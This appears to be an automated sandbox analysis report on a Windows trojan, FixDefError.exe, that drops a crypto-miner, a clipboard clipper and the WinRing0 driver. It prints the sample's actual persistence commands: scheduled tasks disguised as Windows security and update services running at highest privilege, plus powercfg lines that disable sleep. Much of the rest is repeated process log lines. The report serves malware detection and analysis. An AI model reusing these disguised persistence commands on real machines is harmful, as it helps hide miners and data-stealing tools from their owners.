Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\FixDefError.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FixDefError.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FixDefError.exe.log Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe File created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Jump to behavior
Source: WinRing0x64.sys.1.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
Source: C:\Users\user\Desktop\FixDefError.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: FixDefError.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\FixDefError.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Mutant created: \Sessions\1\BaseNamedObjects\eliciting
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_01
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Mutant created: \Sessions\1\BaseNamedObjects\disconsolate
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2728:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: FixDefError.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: FixDefError.exe Static file information: File size 2393088 > 1048576
Source: FixDefError.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FixDefError.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x247800
Source: FixDefError.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: FixDefError.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ImpulseWatch.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
Source: Binary string: ImpulseWatch.pdb|l source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
Source: Binary string: ProgramInstaller.pdb source: FixDefError.exe
Source: Binary string: Impulse.pdb source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
Source: Binary string: ImpulseClipper.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_084E7050 pushfd ; retf 0_2_084E7051
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_09DE4C09 push dword ptr [edx+ebp*2-75h]; iretd 0_2_09DE4C17
PE file contains sections with non-standard names
Source: svhost.exe.1.dr Static PE information: section name: .xdata
Binary contains a suspicious time stamp
Source: FixDefError.exe Static PE information: 0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.759171527144073

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys Jump to behavior
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\svhost.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe Jump to dropped file
Source: C:\Users\user\Desktop\FixDefError.exe File created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\svhost.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
